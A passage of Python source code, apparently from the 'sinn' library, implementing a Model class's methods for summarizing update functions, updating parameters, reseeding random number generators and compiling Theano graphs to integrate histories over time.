corresponding to {t}: \"\n \"it's a relative, not absolute, time index.\")\n return self.time[t]\n else:\n assert self.time.is_compatible_value(t)\n # `t` is already a time value -> just return it\n return t\n\n get_time.__doc__ = History.get_time.__doc__\n\n # ------------------------\n # User-facing descriptions\n\n @class_or_instance_method\n def get_summary(self, hists=None):\n summary = SimpleNamespace()\n summary.model_name = self.name\n State = getattr(self, 'State', None)\n if State:\n summary.state_vars = list(State.__annotations__)\n else:\n summary.state_vars = []\n if isinstance(self, type):\n Parameters = getattr(self, 'Parameters', None)\n if Parameters:\n summary.params = list(Parameters.__annotations__)\n else:\n summary.params = []\n else:\n params = getattr(self, 'params', None)\n if params:\n summary.params = params.get_values()\n else:\n summary.params = {}\n summary.update_functions = self.get_update_summaries(hists)\n summary.nested_models = list(self.nested_models.values())\n return summary\n\n @class_or_instance_method\n def get_update_summaries(self, hists=None) -> Dict[str,str]:\n \"\"\"\n For selected histories, return a string summarizing the update function.\n By default, the histories summarized are those of `self.state`.\n May be called on the class itself, or an instance.\n\n Parameters\n ----------\n hists: list | tuple of histories or str\n List of histories to summarize.\n For each history given, retrieves its update function.\n Alternatively, a history's name can be given as a string\n\n Returns\n -------\n Dict[str,str]: {hist name: hist upd code}\n \"\"\"\n # Default for when `hists=None`\n if hists is None:\n State = getattr(self, 'State', None)\n if State:\n hists = list(self.State.__annotations__.keys())\n else:\n hists = [] # Normalize to all strings; take care that identifiers may differ from the history's name\n histsdict = {}\n nonnested_hists = getattr(self, 'nonnested_histories', {})\n for h in hists:\n if isinstance(h, History):\n h_id = None\n for nm, hist in nonnested_hists.items():\n if hist is h:\n h_id = nm\n break\n if h_id is None:\n continue\n h_nm = h.name\n else:\n assert isinstance(h, str)\n if h not in self.__annotations__:\n continue\n h_id = h\n h_nm = h\n histsdict[h_id] = h_nm\n hists = histsdict\n funcs = {pending.hist_nm: pending.fn\n for pending in self._pending_update_functions}\n if not all(isinstance(h, str) for h in hists):\n raise ValueError(\n \"`hists` must be a list of histories or history names.\")\n\n # For each function, retrieve its source\n srcs = {}\n for hist_id, hist_nm in hists.items():\n fn = funcs.get(hist_id, None)\n if fn is None:\n continue\n src = inspect.getsource(fn)\n # Check that the source defines a function as expected:\n # first non-decorator line should start with 'def'\n for line in src.splitlines():\n if line.strip()[0] == '@':\n continue\n elif line.strip()[:3] != 'def':\n raise RuntimeError(\n \"Something went wrong when retrieve an update function's source. \"\n \"Make sure the source file is saved and try reloading the Jupyter \"\n \"notebook. Source should start with `def`, but we got:\\n\" + src)\n else:\n break\n # TODO: Remove indentation common to all lines\n if hist_id != hist_nm:\n hist_desc = f\"{hist_id} ({hist_nm})\"\n else:\n hist_desc = hist_id\n srcs[hist_desc] = src.split('\\n', 1)[1]\n # 'split' is used to replace the `def` line: callers use\n # the `hist_desc` value to create a more explicit string\n return srcs\n\n @class_or_instance_method\n def summarize(self, hists=None):\n nested_models = self._model_identifiers\n if isinstance(self, type):\n name = getattr(self, '__name__', type(self).__name__) # Copied from `def name()`, so it works also when called as a class method\n nameline = \"Model '{}'\".format(name)\n paramline = \"Parameters: \" + ', '.join(getattr(self.Parameters, '__annotations__', [\"\"])) + \"\\n\"\n if len(nested_models) == 0:\n nestedline = \"\"\n else:\n nestedline = \"Nested models:\\n \" + '\\n '.join(nested_models)\n nestedline = nestedline + \"\\n\"\n nested_summaries = []\n else:\n assert isinstance(self, Model)\n nameline = str(self)\n if hasattr(self, 'params'):\n paramline = f\"Parameters: {self.params}\\n\"\n else:\n paramline = \"Parameters: None\\n\"\n if len(nested_models) == 0:\n nestedline = \"\"\n else:\n nestedlines = [f\" {attr} -> {type(cls).__name__}\"\n for attr, cls in self.nested_models.items()]\n nestedline = \"Nested models:\\n\" + '\\n'.join(nestedlines) + \"\\n\"\n nested_summaries = [model.summarize(hists)\n for model in self.nested_models.values()]\n nameline += '\\n' + '-'*len(nameline) + '\\n' # Add separating line under name\n try:\n stateline = \"State variables: \" + ', '.join(self.State.__annotations__)\n except AttributeError:\n stateline = \"State variables: \"\n stateline = stateline + \"\\n\"\n updateblock = '\\n\\n'.join([\n f\"Update function for {hist_desc}:\\n\" + upd_src\n for hist_desc, upd_src in self.get_update_summaries(hists).items()])\n summary = (nameline + stateline + paramline + nestedline\n + '\\n' + updateblock)\n return '\\n'.join((summary, *nested_summaries))\n\n def print_parameter_info(self, indent=0):\n \"\"\"\n Print for each parameter a set of info typically useful for debugging:\n Python type, NumPy dtype, Theano broadcast pattern / dimensions,\n shape (if numeric value). Usage:\n Print parameter info for model `model`::\n\n >>> model.print_parameter_info()\n\n Print parameter info for an arbitrary parameter set `params`\n (may be dict, ParameterSet, ModelParams or IndexableNamespace)::\n\n >>> from sinn import Model\n >>> Model.print_parameter_info(params)\n\n Mild formatting is used to keep the output human-readable.\n \"\"\"\n if isinstance(self, (dict, sinn.ModelParams, mtb.typing.IndexableNamespace)):\n # Method was called as a class method.\n # 'self' is the provided argument, which is the paramset to print\n Θ = self\n else:\n Θ = self.params\n for k, v in getattr(Θ, 'items', lambda: Θ)():\n if isinstance(v, (dict, sinn.ModelParams, mtb.typing.IndexableNamespace)):\n print(k)\n Model.print_parameter_info(v, indent=indent+2)\n else:\n broadcast = getattr(v, 'broadcastable', None)\n if broadcast is None:\n broadcast = getattr(v, 'ndim', None)\n if broadcast is None:\n broadcast = ''\n else:\n broadcast = f\"{broadcast} dims\"\n shape = getattr(v, 'shape', \"\")\n if shim.issymbolic(shape) and shim.graph.is_computable(v):\n shape = shape.eval()\n shape = str(shape)\n dtype = getattr(v, 'dtype', '')\n print(\" \"*indent + f\"{k}: {type(v)}, \"\n f\"{broadcast}, {shape}, {dtype}\")\n\n\n # ==============================\n # Methods which modify the model\n # ==============================\n\n def lock(self):\n for hist in self.history_set:\n hist.lock()\n def clear(self,after=None):\n \"\"\"\n Invalidate the model data, forcing histories to be recomputed the next\n time they are queried.\n Functionally equivalent to clearing the data, keeping the padding.\n Discards symbolic updates by calling `shim.reset_updates()` and\n `~History.theano_reset()`.\n\n Parameters\n ----------\n after: AxisIndex\n If given, history will only be cleared after this point.\n `cur_tidx` will be set to `after`, rather than `t0idx-1`.\n \"\"\"\n if shim.is_symbolic(after):\n raise TypeError(\n \"`clear` requires a numeric (not symbolic) time index.\")\n shim.reset_updates()\n if after is not None:\n after = self.time.Index(after)\n for hist in self.unlocked_histories:\n hist.clear(after=after.convert(hist.time.Index))\n else:\n for hist in self.unlocked_histories:\n hist.clear()\n\n def eval(self, max_cost :Optional[int]=None, if_too_costly :str='raise'):\n \"\"\"\n Parameters\n ----------\n max_cost: int | None (default: None)\n Passed on to :func:`theano_shim.graph.eval`. This is a heuristic\n to guard againts accidentally expensive function compilations.\n Value corresponds to the maximum number of nodes in the\n computational graph. With ``None``, any graph is evaluated.\n The cost is evaluated per history.\n\n if_too_costly: 'raise' | 'ignore'\n Passed on to :func:`theano_shim.graph.eval`.\n What to do if `max_cost` is exceeded.\n\n Remove all symbolic dependencies by evaluating all ongoing updates.\n If the update is present in `shim`'s update dictionary, it's removed\n from there.\n\n Returns\n -------\n None\n Updates are done in place.\n\n **Side-effects**\n Removes updates from :attr:`theano_shim.config.symbolic_updates`.\n\n .. Todo:: Currently each symbolic variable is compiled and evaluated\n separately with shim.eval(). Wouldn't it be better to compile a\n single update function ?\n \"\"\"\n for h in self.history_set:\n h.eval(max_cost, if_too_costly)\n\n def theano_state_is_clean(self):\n if shim.pending_updates():\n return False\n for hist in self.unlocked_histories:\n # if (hist._num_tidx is not hist._sym_tidx\n # or hist._num_data is not hist._sym_data):\n if hist._taps:\n return False\n for rng in self.rng_inputs:\n if (isinstance(rng, shim.config.SymbolicRNGTypes)\n and len(rng.state_updates) > 0):\n return False\n return True\n\n def theano_reset(self, warn_rng=True):\n \"\"\"\n Put model back into a clean state, to allow building a new Theano graph.\n\n .. warning:: If there are dependencies on RNGs, those will be removed.\n This is necessary to avoid having disconnected RNGs appear in the\n symbolic graph. For NumPy RNGs, this is inconsequential.\n However, for Theano RNGs, this means that `self.rng.seed(0)`\n **will not set the simulator in a predictable state**. The reason\n is that when using Theano, `self.rng` is in fact a *collection* of\n RNGs. When we remove an RNG from this collection, `self.seed` then\n has no way of knowing it should reset it.\n\n The method `self.reseed_rngs` is provided to reseed the RNGs created\n and disconnected by `get_advance_updates`.\n\n :param warn_rng: If True (default), emit a warning if updates to a\n random number generator were cleared.\n\n **Side-effects**: Clears all shim symbolic updates in shim.\n \"\"\"\n shim.reset_updates()\n\n for hist in self.history_set:\n hist.theano_reset()\n for kernel in self.kernel_list:\n kernel.theano_reset()\n\n for rng in self.rng_inputs:\n if (isinstance(rng, shim.config.SymbolicRNGTypes)\n and len(rng.state_updates) > 0 and warn_rng):\n rng_name = getattr(rng, 'name', str(rng))\n if rng_name is None: rng_name = str(rng)\n warn(\"Erasing random number generator updates. Any \"\n \"other graphs using this generator are likely \"\n \"invalidated.\\n\"\n \"RNG: {}\".format(rng))\n rng.state_updates = []\n\n def reseed_rngs(self, seed):\n \"\"\"\n Reset all model RNGs into a predictable state.\n \"\"\"\n # TODO?: Allow resetting only certain entries in _advance_updates ?\n # Or: Option for each entry to be seeded the same way ?\n rngs = {id(rng): rng for rng in self.rng_inputs}\n # Dictionary allows multiple submodels to have an RNG, as long\n # as it is shared.\n if len(rngs) == 0:\n logger.warning(f\"Model {self} has no RNGs; nothing to reseed.\")\n if len(rngs) > 1:\n raise NotImplementedError(\"`reseed_rngs` doesn't support models \"\n \"with multiple random number generators.\")\n rng = next(iter(rngs.values()))\n cur_state_updates = getattr(rng, 'updates', None)\n if cur_state_updates:\n cur_state_updates = cur_state_updates()\n # Each compiled function maps to a different cache_key in _rng_updates\n # Iterate over each set of updates and reseed the RNGs\n if len(self._rng_updates) > 1:\n warn(\"Support for multiple compiled integration functions is still \"\n \"WIP. For reliably deterministic reseeding of RNGs, ensure \"\n \"only one function is compiled.\")\n _num_updates = None\n for update_stash in self._rng_updates.values():\n stashed_state_updates = update_stash.get(rng, [])\n if cur_state_updates is None and stashed_state_updates:\n raise RuntimeError(f\"The model {self.name} seems to have recorded \"\n \"Theano state updates, but uses a plain NumPy \"\n \"RNG. This is likely a bug in sinn.Model\")\n elif stashed_state_updates:\n # We have a Theano RNG, either RandomStream or MRG\n # We know cur_state_updates is a list, because we didn't raise RuntimeError\n # Assumption: Any stashed state updates should come before current ones\n # (in fact, `cur_state_updates` should probably always be empty)\n rng.state_updates = stashed_state_updates + cur_state_updates\n if _num_updates is None:\n _num_updates = len(rng.state_updates)\n elif _num_updates != len(rng.state_updates):\n warn(\"There are multiple compiled integration functions, and they \"\n \"update the RNG state a different number of times. This \"\n \"will still work, in the sense that functions the the model \"\n \"can be integrated without errors. However, we have not \"\n \"confirmed that result will be is entirely deterministic: \"\n \"they may depend on the order in which the functions are \"\n \"compiled, or whether another function is compiled or not.\")\n # Having reattached state updates, rng.seed will update them all\n shim.reseed_rng(rng, seed)\n # Detach the state updates to return the graph in the state it was before\n if stashed_state_updates:\n rng.state_updates = rng.state_updates[len(stashed_state_updates):]\n # NB: `reseed_rng` has changed the state updates, so we can't\n # just reuse cur_state_updates.\n\n # Finish by reseeding the current RNG state\n # This may not be necessary when `_rng_updates` is not empty, but it\n # is conceivable at least that the updates to `stashed_state_updates`\n # would depend on the extra values in `cur_state_updates`.\n # Certainly, when `_rng_updates` is empty, this line is essential,\n # since otherwise `seed` is never used anywhere.\n shim.reseed_rng(rng, seed)\n\n # The code below did not require stashing RNG updates, but only works\n # with RandomStream (MRG updates cannot as easily be identified in\n # the symbolic updates, because they appear as complex expressions\n # rather than special RNG types)\n # # Find all the Theano RNG streams and reseed them.\n # # This is analogous to what `seed` does with the streams listed in `rng.state_updates`\n # srs = sys.modules.get('theano.tensor.shared_RandomStream', None)\n # if srs is not None:\n # seedgen = rng.gen_seedgen # Was seeded by `reseed_rng` above\n # for update_dict in self._advance_updates.values():\n # for v in update_dict:\n # if isinstance(v, srs.RandomStateSharedVariable):\n # old_r_seed = seedgen.randint(2 ** 30)\n # v.set_value(np.random.RandomState(int(old_r_seed)),\n # borrow=True)\n\n def update_params(self, new_params: ModelParams, clear: bool=True, **kwargs):\n \"\"\"\n Update model parameters.\n Clears any kernel cache which depends on these parameters.\n By default, also clears unlocked histories: if one assumes stationarity\n of parameters, then a parameter change invalidates histories.\n\n TODO: Make `new_params` a dict and just update parameters in the dict.\n\n Parameters\n ----------\n new_params: ModelParams | dict\n New parameter values.\n clear:\n True (default): Also clear unlocked histories.\n False: Don't clear any history.\n **kwargs:\n Alternative to specifying parameters with `new_params`\n Keyword arguments take precedence over values in `new_params`.\n \"\"\"\n\n ## Parse new parameters into the format defined by self.Parameters\n if isinstance(new_params, ModelParams):\n new_params = new_params.dict()\n if len(kwargs) > 0:\n new_params = {**new_params, **kwargs}\n pending_params = self.Parameters.parse_obj(\n {**self.params.dict(), **new_params}\n ).get_values()\n # Calling `Parameters` validates all new parameters but converts them to shared vars\n # Calling `get_values` converts them back to numeric values\n\n ## Clear kernel caches\n # TODO: Everything with old_ids & clear_advance_fn should be deprecatable\n # We don't need to clear the advance function if all new parameters\n # are just the same Theano objects with new values.\n\n old_ids = {name: id(val) for name, val in self.params}\n # clear_advance_fn = any(id(getattr(self.params, p)) != id(newp)\n # for p, newp in pending_params.dict().items())\n\n # Determine the kernels for which parameters have changed\n kernels_to_update = []\n for kernel in self.kernel_list:\n if set(kernel.__fields__) & set(new_params.keys()):\n kernels_to_update.append(kernel)\n\n # Loop over the list of kernels and do the following:\n # - Remove any cached binary op that involves a kernel whose parameters\n # have changed (And write it to disk for later retrieval if these\n # parameters are reused.)\n # Once this is done, go through the list of kernels to update and\n # update them\n for obj in self.kernel_list:\n if obj not in kernels_to_update: # Updated kernels cached below\n for op in obj.cached_ops:\n for kernel in kernels_to_update:\n if hash(kernel) in op.cache:\n # FIXME: Should use newer mtb.utils.stablehash\n obj = op.cache[hash(kernel)]\n diskcache.save(str(hash(obj)), obj)\n # TODO subclass op[other] and define __hash__\n logger.monitor(\"Removing cache for binary op {} ({},{}) from heap.\"\n .format(str(op), obj.name, kernel.name))\n del op.cache[hash(kernel)]\n\n for kernel in kernels_to_update:\n # FIXME: Should use newer mtb.utils.stablehash\n diskcache.save(str(hash(kernel)), kernel)\n kernel.update_params(**pending_params.dict())\n\n ## Update self.params in place\n # Check that update is safe\n cur_Θset_info = ParameterSet(mtb.theano.varcollection_typeinfo(self.params.get_values()))\n new_Θset_info = ParameterSet(mtb.theano.varcollection_typeinfo(pending_params))\n errmsgs = []\n for θkey, new_θinfo in new_Θset_info.flatten().items():\n cur_θinfo = cur_Θset_info[θkey]\n if new_θinfo != cur_θinfo:\n errmsgs.append(f\"{θkey}\\n Current value: {cur_θinfo}\\n\"\n f\" New value : {new_θinfo}\")\n if errmsgs:\n msg = (\"Some update values do not match the type or shape of \"\n \"their associated current value.\\n\")\n msg += \"\\n\".join(errmsgs)\n msg += (\"\\n\\nTheano requires that these remain unchanged between \"\n \"compilation and execution.\")\n raise RuntimeError(msg)\n # Perform update\n self.params._set_values(pending_params)\n self.set_submodel_params()\n # TODO:Numeric: Remove this once `numeric()` returns a View\n # (At present we invalidate the _numeric cache when the data or params\n # change, so that subsequent calls to `numeric` get the updated data.)\n self._numeric = None\n\n ## Cleanup: clear histories/compiled fns if necessary\n\n # NB: I think the only way params can change identity is if we have\n # a nested model and `set_submodel_params` reassigns them.\n clear_advance_fn = any(id(val) != old_ids[name]\n for name, val in self.params)\n\n logger.debug(\"Model params are now {}.\".format(self.params))\n\n if clear:\n logger.info(\"Clearing unlocked histories because parameters have changed.\")\n self.clear()\n if clear_advance_fn:\n # Only clear advance function when necessary, since it forces a\n # recompilation of the graph.\n # We need to do this if any of the parameters change identity (e.g.\n # replaced by another shared variable).\n self._compiled_advance_fns.clear()\n\n # FIXME: This function was originally written when the update dictionary\n # would also include all symbolic updates to histories (through _sym_tidx\n # and _sym_data).\n # It also does not seem used (or at least is not covered by a test).\n # We should see if it appears in usage, and if so, make a test for it.\n # Otherwise removal is probably advisable.\n def eval_updates(self, givens=None):\n \"\"\"\n Compile and evaluate a function evaluating the `shim` update\n dictionary. Histories' internal variables tracking symbolic updates\n are unused and untouched.\n If the updates have symbolic inputs, provide values for them through\n the `givens` argument.\n If there are pending symbolic updates, no function is compiled, so you\n can use this as a safeguard at the top of a function to ensure there are\n no unapplied updates, without worrying about the cost of repeated calls.\n \"\"\"\n warn(\"The way symbolic updates are tracked has changed, but since the \"\n \"method `eval_updates` had no clear use case, it was not updated. \"\n \"Please report your use case, so we can determine whether this \"\n \"method is still relevant. In the affirmative, adding a test for \"\n \"it would also be nice.\")\n # TODO: Should this function also evaluate symbolic updates in _taps ?\n # Depends what it's meant for. (See also eval(), which would do something\n # similar without the non-tap updates.)\n upds = shim.get_updates()\n if len(upds) > 0:\n f = shim.graph.compile([], [], updates=upds, givens=givens)\n f()\n # for h in self.history_set:\n # if h._sym_tidx != h._num_tidx:\n # object.__setattr__(h, '_sym_tidx', h._num_tidx)\n # if h._sym_data != h._num_data:\n # object.__setattr__(h, '_sym_data', h._num_data)\n\n # ==============================================\n # Model advancing code\n #\n # This code isn't 100% generic yet;\n # look for TODO tags for model-specific hacks\n #\n # Function overview: (NEEDS UPDATE)\n # - integrate(self, stop): User-facing function. Synonyme: `advance`\n # - _advance(self): Returns a function; use as `self._advance(stop)`:\n # `self._advance` is a property which memoizes the compiled function.\n # - compile_advance_function(self): Function called by `_advance` the first\n # time to do the compilation. Could conceivably also be used by a user.\n # Returns a compiled function.\n # - advance_updates(self, stoptidx): Function used by\n # `compile_advance_function` to retrieve the set of symbolic updates.\n # ==============================================\n def get_state(self, tidx=None):\n \"\"\"\n Return a State object corresponding to the state at time `tidx`\n If no tidx is given, uses `self.cur_tidx` to return the current state\n TODO: Add support for >1 lags.\n \"\"\"\n ti = self.cur_tidx\n return self.State(*(h[ti-self.t0idx+h.t0idx] for h in self.statehists))\n\n def integrate(self,\n upto: Union[int, float],\n histories: Union[Tuple[History],History]=()):\n \"\"\"\n Advance (i.e. integrate) a model.\n For a non-symbolic model the usual recursion is used – it's the\n same as calling `hist[end]` on each history in the model.\n For a symbolic model, the function constructs the symbolic update\n function, compiles it, and then evaluates it with `end` as argument.\n The update function is compiled only once, so subsequent calls to\n `advance` are much faster and benefit from the acceleration of running\n on compiled code.\n\n Parameters\n ----------\n upto: int, float, AxisIndex\n Compute history up to this point (inclusive).\n May also be the string 'end'\n If an AxisIndex, it must be compatible with ``self.time``.\n histories: Tuple of histories to integrate. State histories do not need to\n be included; they are added automatically.\n If only one history is specified, it doesn't need to be wrapped in\n a tuple.\n The value 'all' can be used to specify integrating all histories.\n \"\"\"\n end = upto\n if isinstance(histories, Generator_):\n histories = tuple(histories) # We will iterate more than once\n elif histories == 'all':\n histories = tuple(h for h in self.unlocked_nonstatehists)\n elif isinstance(histories, History):\n histories = (histories,)\n # Remove any locked histories\n if any(h.locked for h in histories):\n locked_hists = tuple\n warn(\"You requested to integrate the following histories, but they \"\n f\"are locked: {[h.name for h in histories if h.locked]}.\")\n histories = tuple(h for h in histories if not h.locked)\n # Remove redundant histories, so cache keys are consistent\n histories = tuple(h for h in histories if h not in self.statehists)\n\n\n # TODO: Rename endtidx -> endidx\n if end == 'end':\n endtidx = self.tnidx\n else:\n if isinstance(end, AbstractAxisIndex):\n end = end.convert(self.time)\n endtidx = self.get_tidx(end, allow_rounding=True)\n\n # Make sure we don't go beyond given data\n for hist in self.history_set:\n if hist.locked:\n tnidx = hist._num_tidx.get_value()\n if tnidx < endtidx.convert(hist.time):\n endtidx = hist.time.Index(tnidx).convert(self.time)\n if not endtidx.in_bounds:\n assert endtidx < hist.time.t0idx # I don't see how we could exceed the upper bound\n warn(\"History '{}' was locked before being computed. \"\n \"Integration aborted.\".format(hist.name)) # No need to abort explicitly: `curtidx` will be larger than `endtidx`\n else:\n warn(\"Locked history '{}' is only provided \"\n \"up to t={}. Output will be truncated.\"\n .format(hist.name, self.get_time(endtidx)))\n\n if not shim.config.use_theano:\n for hist in self.statehists:\n hist._compute_up_to(endtidx.convert(hist.time))\n for hist in histories:\n hist._compute_up_to(endtidx.convert(hist.time))\n\n else:\n # if not shim.graph.is_computable(\n # [hist._sym_tidx for hist in self.statehists]):\n # raise TypeError(\"Integrating models is only implemented for \"\n # \"histories with a computable current time \"\n # \"index (i.e. the value of `hist._sym_tidx` \"\n # \"must only depend on symbolic constants and \"\n # \"shared vars).\")\n # if shim.pending_updates():\n # raise RuntimeError(\"There \"\n # \"are symbolic inputs to the already present updates:\"\n # \"\\n{}.\\nEither discard them with `theano_reset()` or \"\n # \"evaluate them with `eval_updates` (providing values \"\n # \"with the `givens` argument) before advancing the model.\"\n # .format(shim.graph.inputs(shim.get_updates().values())))\n curtidx = self.get_min_tidx(histories + tuple(self.statehists))\n assert(curtidx >= -1)\n\n if curtidx < endtidx:\n # TODO:Numeric: Remove this once `numeric()` returns a View\n # (At present we invalidate the _numeric cache when the data changes,\n # so that subsequent calls to `numeric` get the updated data.)\n self._numeric = None\n for h in self.history_set:\n h._numeric = None\n self._advance(histories)(curtidx, endtidx+1)\n # _advance applies the updates, so should get rid of them\n self.theano_reset()\n\n @property\n def no_histories_have_updates(self):\n \"\"\"\n Return `True` if none of the model's histories have unevaluated\n symbolic updates.\n \"\"\"\n # no_updates = all(h._sym_tidx is h._num_tidx\n # and h._sym_data is h._num_data\n no_updates = all(h._latest_tap == 0\n for h in self.history_set)\n # if no_updates and len(shim.get_updates()) > 0:\n # raise RuntimeError(\n # \"Unconsistent state: there are symbolic theano updates \"\n # \" (`shim.get_updates()`) but none of the model's histories \"\n # \"has a symbolic update.\")\n # elif not no_updates and len(shim.get_updates()) == 0:\n # hlist = {h.name: (h._sym_tidx, h._sym_data) for h in self.history_set\n # if h._sym_tidx is not h._num_tidx\n # and h._sym_data is not h._num_data}\n # raise RuntimeError(\n # \"Unconsistent state: some histories have a symbolic update \"\n # \"({}), but there are none in the update dictionary \"\n # \"(`shim.get_updates()`)\".forma(hlist))\n return no_updates\n\n def _get_cache_key(self, histories=()):\n # The compiled function depends both on the histories we want to update,\n # and on which histories are locked.\n return (histories, tuple(sorted(self.locked_histories)))\n\n def _advance(self, histories=()):\n \"\"\"\n Attribute which memoizes the compilation of the advance function.\n\n Parameters\n ----------\n histories: Set of histories to update. State histories do not need to\n be included; they are added automatically.\n \"\"\"\n cache_key = self._get_cache_key(histories)\n if cache_key not in self._advance_updates:\n self._advance_updates[cache_key] = self.get_advance_updates(histories)\n _advance_updates = self._advance_updates[cache_key]\n # DEBUG\n # for i, s in enumerate(['base', 'value', 'start', 'stop']):\n # self._advance_updates[self.V._num_data].owner.inputs[i] = \\\n # shim.print(self._advance_updates[self.V._num_data]\n # .owner.inputs[i], s + ' V')\n # self._advance_updates[self.n._num_data].owner.inputs[i] = \\\n # shim.print(self._advance_updates[self.n._num_data]\n # .owner.inputs[i], s + ' n')\n if self.no_histories_have_updates:\n if cache_key not in self._compiled_advance_fns:\n logger.info(\"Compiling the update function\")\n self._compiled_advance_fns[cache_key] = self.cached_compile(\n [self.curtidx_var, self.stoptidx_var], [], _advance_updates)\n logger.info(\"Done.\")\n _advance_fn = self._compiled_advance_fns[cache_key]\n else:\n # TODO: Use _compiled_advance_fns to cache these compilations\n # We would need to cache the compilation for each different\n # set of symbolic updates.\n if histories != ():\n raise NotImplementedError(\n \"Not hard to implement; I am just waiting for a case where this is needed.\")\n advance_updates = OrderedDict(\n (var, shim.graph.clone(upd, replace=shim.get_updates()))\n for var, upd in _advance_updates.items())\n\n logger.info(\"Compiling the update function\")\n _advance_fn = self.cached_compile(\n [self.curtidx_var, self.stoptidx_var], [], advance_updates)\n logger.info(\"Done.\")\n\n # I think the point of this lambda is to allow keyword args\n return lambda curtidx, stoptidx: _advance_fn(curtidx, stoptidx)\n\n def get_advance_updates(self, histories=()):\n \"\"\"\n Returns a 'blank' update dictionary. Update graphs do not include\n any dependencies from the current state, such as symbolic/transformed\n initial conditions.\n\n Parameters\n ----------\n histories: Set of histories to update. State histories do not need to\n be included; they are added automatically.\n \"\"\"\n cache_key = self._get_cache_key(histories)\n\n logger.info(\"Constructing the update graph.\")\n # Stash current symbolic updates\n # for h in self.statehists:\n for h in self.history_set:\n h._stash() # Stash unfinished symbolic updates\n updates_stash = shim.get_updates()\n # NB: If _rng_updates is in sync with _advance_updates (as it should), the assertion below always succeeds\n assert len(self._rng_updates[cache_key]) == 0, \"`sinn.Model._rng_updates should only be modified by `get_advance_updates`\"\n shim.reset_updates()\n\n # Get advance updates\n updates = self.advance_updates(self.curtidx_var, self.stoptidx_var, histories)\n # Store the RNG updates so they can be used for reseeding RNGs\n for rng in self.rng_inputs:\n self._rng_updates[cache_key][rng] = rng.updates()\n # Reset symbolic updates to their previous state\n shim.reset_updates()\n self.theano_reset(warn_rng=False)\n # theano_reset() is half redundant with reset_updates(), but we\n # still need to reset the RNG updates\n # for h in self.statehists:\n for h in self.history_set:\n h._stash.pop()\n shim.config.symbolic_updates = updates_stash\n logger.info(\"Done constructing the update graph.\")\n return updates\n\n def cached_compile(self, inputs, outputs, updates, **kwargs):\n \"\"\"\n A wrapper around `shim.graph.compile` which caches the result to disk\n and retrieves it when possible.\n\n .. Note:: Although all arguments to `shim.graph.compile` are supported,\n caching is disabled when arguments other than `inputs`, `outputs`\n and `updates` are specified.\n With additional development and testing, it should be possible to\n support other arguments.\n \"\"\"\n if kwargs:\n warn(\"Compilation caching is disabled when keyword arguments other \"\n \"than `inputs`, `outputs` and `updates` are specified.\")\n fn = None\n cache = False\n else:\n fn = self.compile_cache.get(outputs, updates, rng=self.rng_inputs)\n cache = True\n if fn is None:\n fn = shim.graph.compile(inputs, outputs, updates=updates, **kwargs)\n if cache:\n self.compile_cache.set(outputs, updates, fn, rng=self.rng_inputs)\n else:\n logger.info(\"Compiled advance function loaded from cache.\")\n return fn\n\n def advance_updates(self, curtidx, stoptidx, histories=()):\n \"\"\"\n Compute model updates from curtidx to stoptidx.\n\n Parameters\n ----------\n curtidx: symbolic (int):\n We want to compute the model starting from this point exclusive.\n (`curtidx` is the latest already computed point, so we start at\n ``curtidx + 1``)\n stoptidx: symbolic (int)\n We want to compute the model up to this point exclusive.\n histories: Set of histories to update. State histories do not need to\n be included; they are added automatically.\n\n Returns\n -------\n Update dictionary:\n Compiling a function and providing this dictionary as 'updates' will return a function\n which fills in the histories up to `stoptidx`.\n\n .. rubric:: For developers\n You can find a documented explanation of the function's algorithm\n in the internal documentation: :doc:`/docs/internal/Building an integration graph.ipynb`.\n \"\"\"\n\n histories += tuple(h for h in self.unlocked_statehists if h not in histories)\n # Build the update dictionary by computing each history forward by one step.\n for h in histories:\n h(h._num_tidx+1)\n # The way we do this, at time point k, we evaluate k+1\n # => Start iterations at the _current_ k, and stop one early\n # => curtidx is included below, and we do stoptidx-1\n return self.map_over_time(None, shim.get_updates(), curtidx, stoptidx-1, histories)\n\n def map_over_time(self,\n f : Optional[Callable[[sinn.axis.SymbolicAbstractAxisIndex], Any]]=None,\n updates : Optional[dict]=None,\n curtidx =None,\n stoptidx =None,\n histories: Tuple[History,...]=()\n ):\n \"\"\"\n Return the computational graph of the function `f` evaluated at all\n time points between `curtidx` (inclusive) and `stoptidx` (exclusive).\n The caller is responsible for compiling this graph into a function.\n\n Assumptions:\n\n - During graph creation, all unlocked histories are synchronized\n (their current time indices match, after correcting for padding).\n A RuntimeError is raised if this is not the case.\n - *Unlocked* histories have their current index ≥ `curtidx`.\n - *Locked* histories have their current index ≥ `stoptidx` - 1.\n - Expressions in `updates` and `shim.get_updates()` correspond to\n *pointwise* (or one-step-ahead) computations.\n\n Expressions in both `f` and `updates` may depend on any number of\n `_num_tidx` variables attached to histories (which correspond to that\n history's current time index).\n Concretely, this function thus evaluates `f`, replaces all `_num_tidx`\n variables by an appropriately shifted `curtidx`, and creates a Theano\n `scan` op, which iterates over time points. The op does three things:\n\n - Collect the evaluations of `f`.\n - Advance any unlocked histories.\n - Iterate additional updates listed in `updates`.\n\n Like `scan`, `map_over_time` returns two variables, *outputs* and\n *updates*.\n *Outputs* are the evaluations of `f`.\n *Updates* combine updates for the histories and the variables listed\n in `updates`.\n\n .. Note:: This function will fail if `f` is None and there are neither\n pending symbolic updates on the model's unlocked histories nor\n entries in the `updates` dictionary. Moreover, these updates must\n depend on at least one history time index which can be related to the\n model's time index, such they can be iterated through the scan.\n\n .. Important:: `update` dependencies across time steps are *integrable*\n but not *differentiable*. Example: one could attempt to accumulate a\n loss by passing the pair `{loss: loss + loss_function(t)}`. The\n `integrate` method in this case would correctly accumulate the loss,\n since at each time step updates are applied as prescribed. However\n Theano would then not include these updates when unrolling the graph\n for backpropagation, and the gradient would depend only on t0.\n\n Parameters\n ----------\n f: callable: time index -> value(s)\n Function to evaluate at each time point between `curtidx` and\n `stoptidx`.\n Must take a single input (the time index at which to evaluate `f`);\n can return one or many values.\n updates: dict (update dictionary)\n Default: `shim.get_updates()`\n A Theano update dictionary. The updates should correspond to one\n time point update from ``self.num_tidx`` to ``self.num_tidx+1``.\n This function will then iterate over these updates from\n `curtidx` to `stoptidx`.\n curtidx: symbolic (int):\n Default: `self.curtidx_var`\n We want to compute the model starting from this point inclusive.\n stoptidx: symbolic (int)\n Default: `self.stoptidx_var`\n We want to compute the model up to this point exclusive.\n histories:\n List of histories which we want to update. This only affects which\n histories are included in the update dictionary: the histories\n which are computed are exactly those required to compute `f`.\n This can be used to avoid storing the output from intermediate\n histories: since they are not ultimately stored, when compiling,\n Theano will know it can discard their value once they are no longer\n needed.\n Default not to update any history, thus making the evaluation of `f`\n without side-effects.\n\n Returns\n 